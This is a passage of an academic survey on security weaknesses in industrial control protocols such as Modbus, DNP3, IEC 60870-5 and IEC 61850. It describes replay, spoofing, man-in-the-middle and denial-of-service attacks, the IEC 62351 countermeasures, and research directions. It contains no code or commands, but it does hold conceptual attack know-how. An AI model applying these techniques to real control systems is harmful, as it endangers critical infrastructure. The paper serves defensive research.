phases. In the rst phase, an attacker abuses the low con dentiality protection of CSCPs to obtain sensitive information. This information cansubsequently be used by an attacker to authenticate as a legal entity and compromise the whole system. As a result, these attacks can further lead to integrity and availability violations. Real case scenarios: Modbus, Modbus-F2009, TASE.2, DNP3, DNPSec, DNP3 SA, IEC 60870-5-101, IEC 60870-5-104: Lack of encryp- tion in CSCPs makes it easy for attackers to get infor-mation by simple eavesdropping and use it for further attacks such as user-to-root. A user-to-root attack allows to gain superuser privileges while starting as a normaluser. Having superuser privileges, malicious outsider oflow clearance level can rise to insider level and cause severe damage. The scope of damage to the infrastructureTABLE X VULNERABILITY ANALYSIS RESULTS FOR CREDENTIAL THEFT ATTACK depends on the access rights assigned to the stolen credentials. IEC 61850: Besides the lack of encryption in IEC 61850 as in the other CSCPs, password cracking attacks can be performed on application level services such as FileTransfer Protocol (FTP), Hypertext Transfer Protocol (HTTP) and Telnet running on IEDs, as presented in [59] and [ 60]. Measures, de ned by IEC 62351: Apart from basic authen- tication methods, IEC 62351-8 presents a Role-Based Access Control Model (RBAC) for power systems. This model ensures the security policy implementation by de ning speci c rolesfor users with different levels of trust. Being introduced in a system, an access model restricts the transmission of cre- dentials over a network. However, the implementation of asophisticated access model for each system is a time andmoney consuming process, preceded by a laborious and dif - cult designing phase. An example of static and dynamic role identi cation is discussed in [ 61]; furthermore, the authors emphasize that IEC 62351 does not provide means to enforce authorization rights in detail. In Table X, the results for the credential theft attack analysis are summarized. 2) Integrity Violation Attacks: a) Replay, alteration and spoo ng attacks: Captured messages can be used for replay attacks, by which an attackeruses obtained messages to retransmit them with modi cations or delay in order to trick the target device(s). By retransmitting messages without modi cation, an attacker is able to triggerpull requests from eld devices and obtain enough information regarding their state and current measurement data. Replay attacks with modi cation of data (insertion, deletion, alter-ation) are even more dangerous, because they lead to integrityand availability violations. Modi ed messages can contain wrong data and commands. Furthermore, an attacker can drop initial packets in order to craft a new packet to be sent instead.By injecting his/her own command or data to a control system, an attacker can disturb normal system processes and provoke emergencies. As an example, an attacker can gain access tosmart meters and inject control signals into the system. Theaim of this replay attack may be to shut down the power supply to a certain area. The lack of data link integrity in CSCPs additionally leads to an absence of non-repudiation and, as a result, to repudi- ation attacks. The system is unable to properly track users activities, which allows potentially malicious actions to betaken while forging the origin of these actions. The goal ofsuch attacks is usually to impersonate a legitimate user and exploit this impersonation to execute malicious actions on a Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. VOLKOV A et al. : SECURITY CHALLENGES IN CONTROL NETWORK PROTOCOLS: SURVEY 633 system. Its usage can be extended to general data manipula- tion in the name of others. If such an attack is successful, thelogging information cannot be used for forensic analysis laterand needs to be considered invalid or misleading. For example, an attacker can modify information, transmit- ted from RTUs to the administration subsystem, in order tocreate a misleading perception regarding the current state of the eld devices. Furthermore, it s possible to impersonate commands and messages in order to make administrators thinkthat malicious activities in the system originated from randomdevice failures instead of a third party. Real case scenarios: Modbus: The lack of authentication mechanisms in com- bination with no integrity checks makes the Modbus pro- tocol highly susceptible to replay, alteration and spoo ng attacks. It is possible for any attacker to impersonate alegitimate Modbus master, enabling the reuse of Modbusmessages sent to or from slave devices. Due to the lack of integrity checks, the messages cannot only be resent, but also altered in any way required by an attacker. Similarly,messages may be spoofed, e.g., by impersonating a slave and sending arbitrary messages to its master. OPC UA: Even for the well-secured protocols, such as OPC UA, alteration attacks are taking place if the securitymeans are implemented in the wrong way. Thus, failing to deactivate the security mode None can lead to a protocol downgrade attack and subsequently lead to interceptionand alteration of messages. TASE.2: The absence of integrity measures in TASE.2 leads to easily realizable alteration attacks. Attackers are able to access the data in transmission and insert falseinformation, which will be perceived by the control center as valid. DNP3: An address alteration attack can be achieved tar- geting DNP3. To this end, the attacker s objective is tointercept DNP3 frames and change their corresponding DNP3 destination addresses. Note that a DNP3 address is different from a MAC address. Changing the DNP3destination address of a frame causes other devices to reply, or the intended device fails to receive the message. It was shown in [ 33] that such an attack has some prac- tical limitations if the intention is to forward the framefrom one device to another. More precisely, in order to be able to forward the frame to another device, a TCP connection needs to be established prior to the attack. Asa matter of fact, this attack makes sense if there are more than one master con gured on the slave device. IEC 60870-5-101: Integrity violation attacks are easy to perform in IEC 60870-5-101 environments. The reasonfor such a simplicity is the fact that the IEC 60870-5-101 protocol lacks data integrity features, such as strong checksum algorithms. As depicted in Figure 11,t h e checksum is implemented as a one byte eld. As a result, one of the weakest links in this protocol is its one byte checksum that is not suf cient to provide mes-sage integrity. Over ow of the checksum byte is a trivialoperation and an attacker can alter data values and the checksum eld to perform undetectable modi cations. IEC 60870-5-104: As shown in a simulated environment in [26], replay attacks on IEC 60870-5-104 can eas- ily be performed. Packets are captured from the spanport of the switch and replayed by using Kali Linux scripts. This experiment shows the simplicity of this attack and discusses the problem of its detectabilityin industrial networks, where the presence of stateful Intrusion Detection Systems (IDSs) for low-level devices is unlikely. IEC 61850: Caiet al. [57] illustrate an attack on IEC 61850 based on the fact that SV, GOOSE, and MMS packets on most current smart substation network are transmitted in plain text via TCP/IP and Ethernet pro-tocol. The rst attack is a GOOSE- and SV-based alter- ation attack which can compromise IEDs [ 39]. In [ 44], this attack is extended further by implementing it in amalware that can capture, alter and re-inject GOOSEmessages into the network. Measures, de ned by IEC 62351: Apart from designing a secure network environment, application level IEC 62351can be used to mitigate this attack. The standard provides challenge-response mechanisms based on HMAC with pre- shared key [ 62]. These measures aim to ensure authentication and integrity for the IEC 60870-5-101/IEC 60870-5-104 pro-tocols. In case of 61850, depending on the traf c sent via IEC 61850 (GOOSE, SV, or MMS) and the respective requiredtiming, different security measures are recommended by IEC62351. For MMS, messages are expected to make use of TLS, therefore authentication, con dentiality as well as integrity can be achieved. In contrast, for GOOSE or SV, the extendedProtocol Data Unit (PDU) containing a signature is used to guarantee both authenticity and integrity. Also, the standard suggests the usage of RSA signatures for authenticity andintegrity of extended PDUs, which makes it unsuitable fortime-critical applications (traf c allowing a 4 ms maximum response time), as RSA signatures are relatively expensive in terms of computation power required. Here, other techniquesrequiring a lower computational complexity, such as HMACs would need to suf ce [ 63]. Both measures if implemented correctly can protect against replay, alteration and spoo ngattacks. However, several attacks were discovered even afterthe introduction of IEC 62351. The rst is a replay attack on the GOOSE protocol, where previously sent legitimate messages can be injected again afterthe stNum value (32 bit) is reset to zero [ 40], [64]. According to the validation scheme employed in GOOSE, the receiver accepts a message that was recorded by an attacker shortlybefore the stNum reset and replayed shortly after. Besidesthis replay attack, a DoS can be achieved using the same exploit, because all legitimate subsequent messages after the injected one would be dropped until their respective stNumvalues exceed that of the replayed message. Second, MMS messages are not entirely secured against integrity violations [ 65]. The security of MMS messages is described in IEC 62351-4 and offers two pro les targetingtransport (T-Pro le) and application security (A-Pro le). The T-Pro le covers the protection of information on the TCP/IP Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. 634 IEEE COMMUNICATIONS SURVEYS & TUTORIALS, VOL. 21, NO. 1, FIRST QUARTER 2019 TABLE XI VULNERABILITY ANALYSIS RESULTS FOR REPLAY ,ALTERATION AND SPOOFING ATTACK level using TLS. The A-Pro le de nes security measures to be taken on application layer. However, the authentication used in the A-Pro le does not provide application layer messageintegrity, which makes the usage of the T-Pro le manda- tory to achieve integrity protection. Combining A-Pro le and T-Pro le therefore provides authentication, integrity protectionand con dentiality on transport level and authentication onapplication level. This approach works ne; however only if the transport connection spans the same entities as the appli- cation connection. As soon as there is a difference in transportand application connection hops, security problems arise. An example may be a scenario in which a proxy is used. Here the T-Pro le is terminated by the proxy, whereas the applica-tion connection may be established end-to-end, directly withthe actual entity to be reached. Since IEC 62351-4 does not provide application level integrity, no end-to-end application level security is provided. Third, a security loophole exists enabling replay attacks on the SV protocol, where a previously sent message can be replayed to a different receiver. This attack requires that two ormore SV clients are subscribed to the same data set of a logicalnode. For each communication relationship a separate con- trol block with different parameter values exists. Speci cally of interest for this attack is that the values for the smpRate(number of samples sent per second) may differ. If differ- ent subscribers are receiving messages at different rates, their smpCnt values diverge. This attack works by replaying a mes-sage originally sent to a subscriber with a higher smpRate (andtherefore higher smpCnt value) to a subscriber with a lower smpRate (and therefore lower smpCnt value). In Table XI, the results for the replay, alteration and spoo ng attack analysis are summarized. b) Man-in-the-middle: A MitM attack is a form of attack where the communication between two users is either monitored or even modi ed by an unauthorized third party. Generally, the attacker rst actively eavesdrops on a commu-nication by intercepting a public key message exchange and retransmits this message while replacing the requested key with his/her own. This process is transparent to both origi-nal parties, i.e., they appear to communicate normally. Neitherthe sender nor the receiver recognizes that the communication partner is an attacker trying to access or modify the message before retransmitting it to the originally intended destination. Real case scenarios: Modbus: The complete lack of integrity checks in the Modbus protocol enables any attacker who has access tothe control system network to either eavesdrop on mes-sages or even modify legitimate messages and fabricate new messages and send them to slave devices [ 66].TABLE XII VULNERABILITY ANALYSIS RESULTS FOR MAN-IN-THE-MIDDLE ATTACK DNP3: In [34], attack scenarios based on packet fabri- cation and modi cation were studied by analyzing thefunction codes present in data link and application lay- ers respectively. A MitM attack use case was considered by modifying the function codes for the three differentcases: request of Master Terminal Unit (MTU), responseof RTU, solicited MTU to unsolicited RTU response. It was shown that by fabricating or modifying erroneous data function codes (e.g., read, select, operate) of a DNP3request or response, serious impacts on the control system can be achieved. IEC 60870-5-101, IEC 60870-5-104: Maynard et al. discuss MitM for IEC 60870-5-104 in the power gridenvironment of LINZ STROM GmbH in [ 26]. The attack includes capturing of packets and further packet replace- ment. In order to force victim devices to accept craftedpackets, a setup was created that was able to modify the checksum eld. Yang et al. [27] present MitM attacks on IEC 60870-5-104 based on ARP cache poisoning. IEC 61850: An attacker can use several layer 2 tech- niques to realize a MitM network attack [ 40]. An example is ARP cache poisoning, which was already described before. After a successful ARP poisoning, any traf cmeant for the victim s IP address is sent to the attacker instead. There are several types of attacks that the attacker can produce based on the MitM attack, namely eaves-dropping, alteration, injection, and DoS attacks, whichare further described later in this listing. Measures, de ned by IEC 62351: IEC 62351-5 provides measures to ensure authentication and encryption, i.e., HMACwith a pre-shared key and different encryption recommenda- tions. These recommendations can generally not be rated as strong enough [ 62], but still provide a suf cient level of protec- tion against adversaries with low threat levels. However, theprotection is not high enough to withstand high threat level adversaries. In Table XII, the results for the Man-in-the-Middle attack analysis are summarized. 3) Availability Violation Attacks: a) DoS/distributed denial of service (DDoS): DoS attacks have the purpose of causing damage by drastically lim-iting, even denying, access to speci c resources, thus making them unusable to intended users [ 67]. These attacks usu- ally cause detrimental effects on the availability of sensitiveinfrastructure. The most common scenario for CSCPs is as fol- lows: A number of active processes running on the attacker s machine or compromised system devices ood the communi-cation channel with traf c targeting one or several end nodes.As a result, the target node is slowed down and cannot guar- antee further operation. Also, a loss of packets sent by other Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. VOLKOV A et al. : SECURITY CHALLENGES IN CONTROL NETWORK PROTOCOLS: SURVEY 635 nodes is a common side effect of such an attack. The scope of damage depends mainly on the attacker s resources. In case ofa DDoS attack meaning the attacker(s) use a large numberof traf c generators the whole ICS cannot satisfy real-time constrains anymore. With a wide range of dedicated DoS soft- ware available, attackers can easily produce fake Modbus orIEC 60870 packets not serving a valid purpose and ood the network links with them. Real case scenarios: Modbus: Modbus is lacking broadcast suppression, which leads to the possibility to send messages to all con- nected devices of a control network. This in turn offers an attacker an effective mean to create a DoS conditionby ooding messages received by all serially connected devices [ 66]. TASE.2: The availability of TASE.2 cannot be guaranteed in modern wide area networks, since the protocol com-pletely relies on lower level communication protocols. The way the TASE.2 protocol stack is organized directly in uences its security. Furthermore, interoperability prob-lems may arise due to the different, vendors-speci c implementations, which may in uence the stable opera- tion. In [ 68], potential attacks impacting availability based on traf c pattern analysis are discussed. The monitoringof traf c rates can pinpoint moments when systems are facing critical situations. The destruction of a communi- cation channel at this point of time will therefore have amajor detrimental impact. This attack is possible even ifthe TASE.2 traf c is encrypted. DNP3: Based on [ 33], DoS attacks were created by mod- ifying the length eld of a DNP3 payload, which alsonecessitated the recalculation of the Cyclic Redundancy Check (CRC) eld, sent from slave IECs to the mas- ter device. As a side effect of this attack, the masterdevice rejects the corresponding frame and consequentlythe required physical mechanism fails. IEC 60870-5-101, IEC 60870-5-104: SYN ooding is a generic example of DoS attack on CSCPs with TCP/IPpro les, such as IEC 60870-104 or Modbus. It uses resources of the TCP stack to over ow a server by send- ing an unbounded number of SYN packets and ignoringthe SYN ACKs returned by the server. As a result, aserver exceeds its resources waiting for the anticipated ACK that is expected to arrive from a legitimate client. Using a suf cient number of SYN packets forces the tar-get server to refuse any further legitimate connections since the number of concurrently opened TCP connec- tions is limited. This event is considered as DoS andleads to availability violation. IP fragmentation attacksare another common form of DoS attack on CSCPs based on TCP/IP. In this scenario, an attacker overbears the communication channels by abusing the datagramfragmentation mechanisms. IEC 61850: There are several types of DoS attacks that can be launched against an IEC 61850 network. A triv-ial DoS attack that exploits common services on IEDs isshown in [ 59]. As an example, it is assumed there are two services running on an IED (The rst service is FTP onTABLE XIII VULNERABILITY ANALYSIS RESULTS FOR DOS/DD OSA TTACK port 21, the second is Telnet on port 23). A DoS attack is then executed by opening multiple sessions on one of theservices and keeping them idle. SYN ooding and bufferover ow attacks are two other types of DoS attacks that have been simulated and tested on IEC 61850 substa- tion networks in [ 69]. SYN ood attacks are possible because some IEDs run services such as FTP, HTTP and Telnet for management purposes [ 69]. Buffer over ow attacks are done by overrunning buffer boundaries, lead-ing to the memory space being overwritten while writingdata to buffers. This attack is executed by transmitting malicious code into IEDs, which is possible due to both the vulnerability of IEDs and the unavailability of secu-rity measures for IEDs to detect malicious code [ 69]. Another DoS attack can be realized by sending a large number of GOOSE or SV messages to an IED so that itbecomes overwhelmed and no longer able to respond tolegitimate requests [ 39]. Moreover, a DoS can be realized by performing a GOOSE poisoning attack as proposed in [43]. The goal of the attack is to get the subscriber to accept GOOSE messages with a higher sequence num- ber than the ones sent by the publisher. As a result, all GOOSE messages from the publisher will be consid-ered outdated by the subscribers and the subscribers willonly accept and process the GOOSE messages from the attacker. There are three variants of GOOSE poisoning attacks proposed in [ 43]. The three variants are high sta- tus number attack, high rate ooding attack, and semantic attack. Measures, de ned by IEC 62351: In [70], it is mentioned that IEC 62351 does not suf ciently cover DoS/DDoS attacksand they should be guarded against through implementation- speci c measures. In Table XIII, the results for the DoS/DDoS attack analysis are summarized. D. Security Recommendations In the following, rst, several general security recommen- dations are presented; second, enhancements to the IEC 62351standard going beyond its current state are covered; third, security improvements to CSCPs are discussed. 1) General Protection Measures: As shown in Section V-C, protocol speci c measures, de ned by the IEC 62351 security standard, are not suf cient against existing threats. Detailedassessments are presented in [ 62] and [ 65]. Some attacks are not covered by the standard or protection measures are not Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. 636 IEEE COMMUNICATIONS SURVEYS & TUTORIALS, VOL. 21, NO. 1, FIRST QUARTER 2019 effective by design. As a result, IEC 62351 is not a panacea for resolving all security challenges at hand. This section providesan overview of general network security means to mitigate theimpact from malicious activities. Reliable network security remains the main requirement and allows to prevent unwanted access and exploration ofthe network, including the detection of network nodes. Since the idea of security by obscurity is not a workable solu- tion, a proper design and implementation to secure thenetwork perimeter is essential. A secure network perime-ter includes grained rewalling, effective IDS or Intrusion Prevention System (IPS), depending on the network segment. Authentication, sophisticated access control and monitoringshould be introduced for all network segments. Apart from the enforced network perimeter, redundant network services should be installed to ensure reliability. Security measures should be applied not only to CSCPs and control network devices, but also to the switching and routing points. For example, one of the possible techniques to mitigate attacks on switching devices, such as CAM tableover ow attacks, is to activate port security. It ensures that no MAC ooding of the switching device is possible, because the MAC address count will be limited by default to one. To relaxthis restriction for complex industrial networks, which requiremore exibility, vendor-speci c methods can be applied. Furthermore, the port can be con gured to shut down or block MAC addresses that exceed a speci ed limit. Moreover,routing and switching security mechanisms allow to preventseveral types of DoS attacks and attacks on IP-networking, such as IP fragmentation. 2) IEC 62351 Improvement Recommendations: The cur- rent granularity and detail of the security speci cations given in IEC 62351-3 leave room for standard-compliant systems not to uphold the required security. The key factor to remedythis security loophole is the speci cation of key managementinside IEC 62351. Without a clearly de ned key management policy, adversaries are able to undermine message con dential- ity, integrity, as well as authentication. This in turn leadsto further attacks. Especially in the case of IEC 61850, it is expected that the standard may evolve beyond its current state to include, e.g., feeder and control center communication. Althoughother protocols covering communications beyond substations exist, the usage of IEC 61850 can improve these applica- tions [ 10], e.g., by using the same logical nodes, or applying the same messaging techniques such as GOOSE and SV.Mohagheghi et al. state that an expanding of IEC 61850 to include control centers is technically possible, however likely to achieve questionable performance. Therefore, solu-tions which require additional work are to either provide a proxy server for IEC 61850 data in substations, or to map the IEC 61850 data model content to traditional CSCPs, suchas DNP3 or IEC 60870-5 [ 10]. Moreover, the interoperabil- ity requirements imposed by IEC 61850-5 in combination with IEC 62351 allow a downgrade attack to be implemented. The underspeci cation in IEC 62351-3 leaves many security-relevant decisions to the system manufacturers, leading either to incompatibilities, or to choose the lowest common denom- inator of security as common ground. As [ 71] argues, thereis a reasonable likelihood that the security aws do not only exist for the combination of IEC 61850 with IEC 62351, butalso in other communication protocols, such as IEC 60870 orDNP3. Also, Fries et al. recommends to extend IEC 62351 to overcome the identi ed weaknesses by introducing securitysessions for MMS connections in [ 65]. This requires changes in the IEC 62351-4 for security of MMS communication as currently only the MMS-initiated command has the appro-priate ASN.1 structures to transport security information.Furthermore, to provide the required integrity protection, the current signature calculation in IEC 62351-4 needs to be revised [ 65]. 3) CSCP Improvement Recommendations: To secure CSCPs based on TCP/IP, an often employed x is to use TLS. While these protocols offer reliable security, they them-selves are not without limitations, especially in the contextof ICSs. Foremost, TLS suffers from the fundamental con- strain that they can only be used in combination with reliable transport protocols (i.e., TCP), restricting their usage in ICSenvironments. In addition, they have performance overheads associated with them, cannot provide non-repudiation, and can only ensure channel security, in contrast to object secu-rity. Moreover, TLS does not provide protection against traf canalysis or DoS attacks based on connection resets, since the connection handling is done by a lower level protocol (i.e., TCP) [ 72]. Therefore, although the usage of TLS offers an easy to implement security bene t, future improvements need to focus on nding integral security extensions for CSCPs themselves, as partly demonstrated in, e.g., DNP3 SA. VI. C ONCLUSION Current control systems are based on ICT devices and their ability to communicate and exchange information with eachother by means of a well-de ned network. An example of this can be found in the evolution of the traditional power grid to today s smart grid where energy planning is enabledthrough data monitoring and controlling of the distributedpower generating resources. Early on, these networks were typically realized using only proprietary solutions. However, the need for remote controland the advances in area of computer networks (e.g., Internet) led to the blending of traditional control networks with the modern Internet. In parallel, several network protocols weredeveloped, each targeting speci c requirements in order toachieve communication in control systems. On the one hand, the merge of control networks and the Internet contributed to managing control systems without being on site (which washighly required). On the other hand, however, control systems inherited the security vulnerabilities that only threatened the modern Internet before. In this paper, we carried out a qualitative security analy- sis by studying the most broadly employed CSCPs: Modbus (and three of its variants), OPC UA, TASE.2, DNP3 (and two of its variants), IEC 60870-5-101, IEC 60870-5-104, and IEC61850. To this end, we proposed a uniform methodology to perform the security analysis. First, we composed an adversary model and de ned different attack scenarios; consequently, the Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. VOLKOV A et al. : SECURITY CHALLENGES IN CONTROL NETWORK PROTOCOLS: SURVEY 637 vulnerable protocols were identi ed before and after applying the IEC 62351 security standard. In cases where IEC 62351does not propose any (or no suitable) security solutions,recommendations were presented to protect against these vul- nerabilities. It is worthwhile mentioning that in this paper, we focused on protocol vulnerabilities exploitable throughnetwork-based attacks. However, there are also known hardware/software vulnera- bilities in networking elements that continue to be exploitable.Here, remote attackers can discover the currently running ver-sion of the software and use known exploits to cause DoS or obtain access over a targeted node. Also, threats can emanate not only from the physical medium but from the control systemdevices themselves and the way networking functions are real- ized. Thus, powerful adversaries, such as funded organizations and hostile nations, have an ability to convince vendors toimplement backdoors into hardware and software such as com-munication devices, administration and monitoring systems. These are hidden pieces of hardware/software usually used by vendors to provide remote support such as troubleshooting,software updates and patching. These backdoors can, how- ever, also be used to obtain access to sensitive information as well as to cause DoS to critical system elements. VII. F UTURE RESEARCH PERSPECTIVES After the careful analysis of the most prominent legacy and current CSCPs, several research orientations requiring further work are identi ed in this Section, which are organized into different topics. A. IEC 62351: Challenges and Performance The security standard IEC 62351 is currently partly un n- ished as well as underspeci ed, as illustrated in Section V-D2 . While the issue of underspeci cation is solvable by updat- ing the standard using more ne-granular speci cations for security solutions, challenges especially do exist in detectingcurrently unknown loopholes and interaction effects betweendifferent CSCPs in combination with IEC 62351. Finding and effectively solving such shortcomings will be an important future challenge worth investigating. Apart from the future work required in the security of IEC 62351, it is also important to extensively test its impact on the achieved performance of CSCPs, as applicability isonly achievable if Quality of Service (QoS) requirements canbe upheld. To be able to guarantee that, extensive experi- mentation in numerous scenarios and possibly subsequent optimizations are required. B. Standardization and Validation Standardization is still a major topic in critical infras- tructures overall, and in control systems and protocols in particular. This is mainly because of two reasons: First, stan- dardization is directly connected to interoperability, enablingvendor-agnostic communication between devices. Second,standardization offers reliable security and a more focused, in-depth security development and analysis. Therefore, theidenti cation of major future standards, as well as their rigor- ous security analyses will be important upcoming challenges. While standardization de nes the required speci cations, it was shown in [ 73] that, for the use case of IEC 60870-5-104 protocol, not every device implementing the corresponding protocol, actually follows the speci cation. Hence, new rig-orous methodologies and tools need to be devised for the sake of validating whether the devices implement correctly the corresponding standards speci cations. C. Legacy Protocols: IoT and Further Improvements The development of the security measures for CSCPs makes them more applicable for the further areas, such as IoT. For example, light-weight, open and compatible Modbus can serve as a control mean in non-industrial IoT systems. Furthermore, although there are several security improve- ments available to legacy protocols, such as Modbus and DNP3, which were discussed in this survey, there is still nosolution that ful lls all security requirements: Cremers et al. discuss that DNP3 SA still has several security issues. These include, among others, an improv- able authentication properties for the Update Key Changemessages, an unclear speci cation regarding the usage of Challenge SeQuence numbers (CSQs), and a missing deprecation of HMAC-SHA-1. A full list is given in [ 35]. These issues need to be addressed in future versions ofthe DNP3 SA protocol. In the case of DNPSec, it is highly recommended toupdate the protocol to employ recent and secure cryp-tographic algorithms, as 3-DES and SHA-1 are broken, as previously stated in Section III-A . D. Performance Improvements for CSCPs Maintaining an acceptable performance for the security means is another issue to be solved during design and devel-opment of secure CSCPs. This paper does not focus on the precise analysis of the limited applicability of security mech- anisms to the industrial networks with special requirementsand constrains. As an example, the performance of DNPSec makes it unsuited for the usage in resource constrained envi- ronments [ 21]. Further research in this direction may reveal the way effective and secure protocols can be designed. Furthermore, the usage of signatures is an important secu- rity feature in CSCPs, allowing effective authentication and integrity protection. While RSA is currently often used, nd-ing/optimizing a signature scheme to improve performance to a real-time level is still an open issue. In addition to the optimization of signature schemes, the key distribution within ICSs is a challenge that requires fur-ther research [ 74]. Most protocols using symmetric encryption schemes assume a secure channel to pre-establish shared keys and argue that a trusted certi cate authority to establish aPublic Key Infrastructure (PKI) cannot be safely assumed. While algorithms employing asymmetric schemes offer addi- tional security bene ts, they suffer from major performancedrawbacks. Apart from the aforementioned future research topics, only the rst step of a security process (as de ned in IEC 62351), Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. 638 IEEE COMMUNICATIONS SURVEYS & TUTORIALS, VOL. 21, NO. 1, FIRST QUARTER 2019 namely the security assessment, is performed in this article. As future work, it would be interesting to analyze the impactof the assessment results on the rest of the process such assecurity policy, deployment, etc. Furthermore, security stan- dards and requirements are likely to change and evolve in the future, so an ongoing contribution in this respect will be toupdate the presented security assessment based on the re ned standards and requirements. A CKNOWLEDGMENT The research leading to these results was supported by the Bavarian Ministry of Economic Affairs and Media, Energy and Technology as part of the East-Bavarian Centre of InternetCompetence project and Deutsche Forschungsgemeinschaft (DFG, German Research Foundation) research grant #ME 1703/12-1, entitled Black-Start. R EFERENCES [1] M. Naedele, Addressing IT security for critical control systems, in Proc. 40th Annu. Hawaii Int. Conf. Syst. Sci. , Waikoloa, HI, USA, Jan. 2007, pp. 115 124. [2] B. Miller and D. Rowe, A survey SCADA of and critical infras- tructure incidents, in Proc. ACM 1st Annu. Conf. Res. Inf. Technol. (RIIT) , Calgary, AB, Canada, 2012, pp. 51 56. [Online]. Available: http://doi.acm.org/10.1145/2380790.2380805 [3] W. Yusheng et al. , Intrusion detection of industrial control system based on Modbus TCP protocol, in Proc. IEEE 13th Int. Symp. Auton. Decentralized Syst. (ISADS) , Bangkok, Thailand, Mar. 2017, pp. 156 162. [4] The Register. (2008). Polish Teen Derails Tram After Hacking Train Network . Accessed: Apr. 18, 2017. [Online]. Available: http://www.theregister.co.uk/2008/01/11/tram_hack/ [5] J. A. Crain and S. Bratus, Bolt-on security extensions for industrial control system protocols: A case study of DNP3 SAv5, IEEE Security Privacy Mag. , vol. 13, no. 3, pp. 74 79, May/Jun. 2015. [6] T. H. Morris and W. Gao, Industrial control system cyber attacks, in Proc. 1st Int. Symp. ICS SCADA Cyber Security Res. (ICS-CSR) , 2013, pp. 22 29. [Online]. Available: http://dl.acm.org/ citation.cfm?id=2735338.2735341 [7] I. N. Fovino, A. Coletta, A. Carcano, and M. Masera, Critical state- based ltering system for securing SCADA network protocols, IEEE Trans. Ind. Electron. , vol. 59, no. 10, pp. 3943 3950, Oct. 2012. [8] B. Babu, T. Ijyas, P. Muneer, and J. Varghese, Security issues in SCADA based industrial control systems, in Proc. 2nd Int. Conf. Anti Cyber Crimes , Abha, Saudi Arabia, Mar. 2017, pp. 47 51. [9] D. Dzung, M. Naedele, T. P. V . Hoff, and M. Crevatin, Security for industrial communication systems, Proc. IEEE , vol. 93, no. 6, pp. 1152 1177, Jun. 2005. [10] S. Mohagheghi, J. Stoupis, and Z. Wang, Communication protocols and networks for power systems-current status and future trends, in Proc. IEEE/PES Power Syst. Conf. Exposit. , Seattle, WA, USA, Mar. 2009, pp. 1 9. [11] R. E. Johnson, Survey of SCADA security challenges and potential attack vectors, in Proc. Int. Conf. Internet Technol. Secured Trans. , London, U.K., Nov. 2010, pp. 1 5. [12] F. Alsiherov and T. Kim, Research trend on secure SCADA network technology and methods, WSEAS Trans. Syst. Control , vol. 5, no. 8, pp. 635 645, Aug. 2010. [13] M. Robinson, The SCADA threat landscape, in Proc. 1st Int. Symp. ICS SCADA Cyber Security Res. (BCS) , London, U.K., 2013, pp. 30 41. [14] T. Bartman and K. Carson, Securing communications for SCADA and critical industrial systems, in Proc. 69th Annu. Conf. Protect. Relay Eng., College Station, TX, USA, Apr. 2016, pp. 1 10. [15] J. T. Michalski, A. Lanzone, J. Trent, S. Smith, and J. Michalski, Secure ICCP integration considerations and recommendations, SandiaNat. Lab., Albuquerque, NM, USA, Rep. SAND2007-3345, 2007. [16] M. H. Schwarz and J. Bo rcs k, A survey on OPC and OPC-UA: About the standard, developments and investigations, in Proc. XXIV Int. Conf. Inf. Commun. Autom. Technol. , Oct. 2013, pp. 1 6.[17] M. Kroto l and D. Gollmann, Industrial control systems security: What is happening? in Proc. 11th IEEE Int. Conf. Ind. Informat. , Bochum, Germany, Jul. 2013, pp. 670 675. [18] Z. Drias, A. Serhrouchni, and O. V ogel, Analysis of cyber secu- rity for industrial control systems, in Proc. Int. Conf. Cyber Security Smart Cities Ind. Control Syst. Commun. , Shanghai, China, Aug. 2015, pp. 1 8. [19] M. Mallouhi, Y . Al-Nashif, D. Cox, T. Chadaga, and S. Hariri, A testbed for analyzing security of SCADA control systems (TASSCS), inProc. Innov. Smart Grid Technol. , Anaheim, CA, USA, Jan. 2011, pp. 1 7. [20] S. East, J. Butts, M. Papa, and S. Shenoi, A Taxonomy of Attacks on the DNP3 Protocol . Heidelberg, Germany: Springer, 2009, pp. 67 81. [Online]. Available: https://doi.org/10.1007/978-3-642-04798-5_5 [21] D. Lee, H. Kim, K. Kim, and P. D. Yoo, Simulated attack on DNP3 protocol in SCADA system, in Proc. 31th Symp. Cryptography Inf. Security , 2014, pp. 1 6. [22] D. S. Pidikiti, R. Kalluri, R. K. S. Kumar, and B. S. Bindhumadhava, SCADA communication protocols: Vulnerabilities, attacks and possible mitigations, CSI Trans. ICT , vol. 1, no. 2, pp. 135 141, Jun. 2013. [Online]. Available: https://doi.org/10.1007/s40012-013-0013-5 [23] P. Matou sek, Description and analysis of IEC 104 protocol, Faculty Inf. Technol., Brno Univ. Technol., Brno, Czech Republic, Rep. FIT-TR-2017-12, 2017. [24] J. L. Rrushi, SCADA Protocol Vulnerabilities . Heidelberg, Germany: Springer, 2012, pp. 150 176. [Online]. Available: https://doi.org/ 10.1007/978-3-642-28920-0_8 [25] J. Jarmakiewicz, K. Ma slanka, and K. Parobczak, Development of cyber security testbed for critical infrastructure, in Proc. Int. Conf. Military Commun. Inf. Syst. , Krak w, Poland, May 2015, pp. 1 10. [26] P. Maynard, K. McLaughlin, and B. Haberler, Towards understanding man-in-the-middle attacks on IEC 60870-5-104 SCADA networks, in Proc. 2nd Int. Symp. ICS SCADA Cyber Security Res. (BCS) , 2014, pp. 30 42. [27] Y . Yang et al. , Man-in-the-middle attack test-bed investigating cyber- security vulnerabilities in smart grid SCADA systems, in Proc. Int. Conf. Sustain. Power Gener. Supply (IET) , Hangzhou, China, 2012, pp. 1 8. [28] I. N. Fovino, A. Carcano, M. Masera, and A. Trombetta, Design and implementation of a secure Modbus protocol, in Critical Infrastructure Protection III , C. Palmer and S. Shenoi, Eds. Heidelberg, Germany: Springer, 2009, pp. 83 96. [29] A. Shahzad et al. , Real time MODBUS transmissions and cryptography security designs and enhancements of protocol sensitive information, Symmetry , vol. 7, no. 3, pp. 1176 1210, 2015. [Online]. Available: 